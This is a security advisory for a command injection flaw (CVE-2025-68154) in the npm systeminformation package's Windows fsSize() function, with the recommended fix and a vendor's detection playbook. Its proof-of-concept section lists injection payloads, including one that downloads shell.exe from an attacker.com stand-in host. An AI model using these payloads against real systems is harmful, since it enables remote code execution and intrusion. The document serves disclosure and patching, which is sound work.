📦 npm

GHSA-wphj-fx3q-84ch

HIGH

systeminformation has a Command Injection vulnerability in fsSize() function on Windows

Also known as CVE-2025-68154
Published
Dec 16, 2025
Updated
Feb 4, 2026
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed

EPSS Exploitation Probability

via FIRST.org ↗
12.9% probability of exploitation in next 30 days
Moderate Risk, 96th percentile (+12.81%)
[EPSS trend chart, Jan 26 to Jun 26; y-axis 0.00% to 16.7%; plotted values 0.1% and 12.9%]

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected

Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.

systeminformation (npm): 9.0M downloads / week

Description

Summary

The fsSize() function in systeminformation is vulnerable to OS Command Injection (CWE-78) on Windows systems. The optional drive parameter is directly concatenated into a PowerShell command without sanitization, allowing arbitrary command execution when user-controlled input reaches this function.

Affected Platforms: Windows only

CVSS Breakdown:

  • Attack Vector (AV:N): Network - if used in a web application/API
  • Attack Complexity (AC:H): High - requires application to pass user input to fsSize()
  • Privileges Required (PR:N): None - no authentication required at library level
  • User Interaction (UI:N): None
  • Scope (S:U): Unchanged - executes within Node.js process context
  • Confidentiality/Integrity/Availability (C:H/I:H/A:H): High impact if exploited

Note: The actual exploitability depends on how applications use this function. If an application does not pass user-controlled input to fsSize(), it is not vulnerable.


Details

Vulnerable Code Location

File: lib/filesystem.js, Line 197

if (_windows) {
  try {
    const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl`;
    util.powerShell(cmd).then((stdout, error) => {

The drive parameter is concatenated directly into the PowerShell command string without any sanitization.

Why This Is a Vulnerability

This is inconsistent with the security pattern used elsewhere in the codebase. Other functions properly sanitize user input using util.sanitizeShellString():

File                Line   Function                 Sanitization
lib/processes.js    141    services()               util.sanitizeShellString(srv)
lib/processes.js    1006   processLoad()            util.sanitizeShellString(proc)
lib/network.js      1253   networkStats()           util.sanitizeShellString(iface)
lib/docker.js       472    dockerContainerStats()   util.sanitizeShellString(containerIDs, true)
lib/filesystem.js   197    fsSize()                 No sanitization

The sanitizeShellString() function (defined at lib/util.js:731) removes dangerous characters like ;, &, |, $, `, #, etc., which would prevent command injection.


PoC

Attack Scenario

An application exposes disk information via an API and passes user input to si.fsSize():

// Vulnerable application example
const si = require('systeminformation');
const http = require('http');
const url = require('url');

http.createServer(async (req, res) => {
  const parsedUrl = url.parse(req.url, true);
  const drive = parsedUrl.query.drive; // User-controlled input
  
  // VULNERABLE: User input passed directly to fsSize()
  const diskInfo = await si.fsSize(drive);
  
  res.end(JSON.stringify(diskInfo));
}).listen(3000);

Exploitation

Normal Request:

GET /api/disk?drive=C:

Malicious Request (Command Injection):

GET /api/disk?drive=C:;%20whoami%20%23

Command Construction Demonstration

The following demonstrates how commands are constructed with malicious input:

Normal usage:

Input: "C:"
Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C: | fl

With injection payload C:; whoami #:

Input: "C:; whoami #"
Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; whoami # | fl
         (the semicolon after C: terminates the first command; the # comments out the trailing | fl)

PowerShell will execute:

  1. Get-WmiObject Win32_logicaldisk | ... | where -property Caption -eq C: (original command)
  2. whoami (injected command)
  3. Everything after # is commented out

PoC Script

/**
 * Command Injection PoC - systeminformation fsSize()
 * 
 * Run with: node poc.js
 * Requires: npm install systeminformation
 */

const os = require('os');

// Simulates the vulnerable command construction from filesystem.js:197
function simulateVulnerableCommand(drive) {
  const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl`;
  return cmd;
}

// Test payloads
const payloads = [
  { name: 'Normal', input: 'C:' },
  { name: 'Command Execution', input: 'C:; whoami #' },
  { name: 'Data Exfiltration', input: 'C:; Get-Process | Out-File C:\\temp\\procs.txt #' },
  { name: 'Remote Payload', input: 'C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\\temp\\shell.exe #' },
];

console.log('=== Command Injection PoC ===\n');
console.log(`Platform: ${os.platform()}`);
console.log(`Note: Actual exploitation requires Windows\n`);

payloads.forEach(p => {
  console.log(`[${p.name}]`);
  console.log(`  Input: ${p.input}`);
  console.log(`  Command: ${simulateVulnerableCommand(p.input)}\n`);
});

PoC Output

=== Command Injection PoC ===

Platform: win32
Note: Actual exploitation requires Windows

[Normal]
  Input: C:
  Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C: | fl

[Command Execution]
  Input: C:; whoami #
  Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; whoami # | fl

[Data Exfiltration]
  Input: C:; Get-Process | Out-File C:\temp\procs.txt #
  Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; Get-Process | Out-File C:\temp\procs.txt # | fl

[Remote Payload]
  Input: C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\temp\shell.exe #
  Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\temp\shell.exe # | fl

As shown, the attacker's commands are injected directly into the PowerShell command string.


Impact

Who Is Affected?

  • Applications running systeminformation on Windows that pass user-controlled input to fsSize(drive)
  • Web applications, APIs, or CLI tools that accept drive letters from users
  • Monitoring dashboards that allow users to specify which drives to query

Potential Attack Scenarios

  1. Remote Code Execution (RCE) - Execute arbitrary commands with Node.js process privileges
  2. Data Exfiltration - Read sensitive files and exfiltrate data
  3. Privilege Escalation - If Node.js runs with elevated privileges
  4. Lateral Movement - Use the compromised system to attack internal network
  5. Ransomware Deployment - Download and execute malicious payloads

Recommended Fix

Apply util.sanitizeShellString() to the drive parameter, consistent with other functions in the codebase:

  if (_windows) {
    try {
+     const driveSanitized = drive ? util.sanitizeShellString(drive, true) : '';
-     const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl`;
+     const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${driveSanitized ? '| where -property Caption -eq ' + driveSanitized : ''} | fl`;
      util.powerShell(cmd).then((stdout, error) => {
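Review bot: sanitizeShellString(drive, true) strips metacharacters but silently rewrites the input, so a request for `C:; whoami #` turns into a query for a caption that does not exist rather than an error the caller can see; since a drive specifier in this filter is a single letter followed by a colon, validate `drive` against that exact shape before it reaches the template string and reject anything else, keeping the strict-mode call as defence in depth. Note also that the `${driveSanitized ? ... : ''}` guard means any value that strips down to the empty string drops the `where` clause entirely and returns every logical disk, which a caller that asked for one drive will not expect.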

The true parameter enables strict mode which removes additional characters like spaces and parentheses.


The reporter thanks the developers working on the project. The Systeminformation Project hopes this report helps improve its security. Please let systeminformation know if any additional information or clarification is needed.

Affected Packages

1 total, 1 fixed

Ecosystem   Package             Vulnerable range   Fix
npm         systeminformation   all versions       5.27.14

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for systeminformation. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update systeminformation to 5.27.14 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-wphj-fx3q-84ch is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-wphj-fx3q-84ch is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-wphj-fx3q-84ch. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

O3 Security · Impact-Aware SCA

Is GHSA-wphj-fx3q-84ch in your dependencies?

O3 detects GHSA-wphj-fx3q-84ch across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.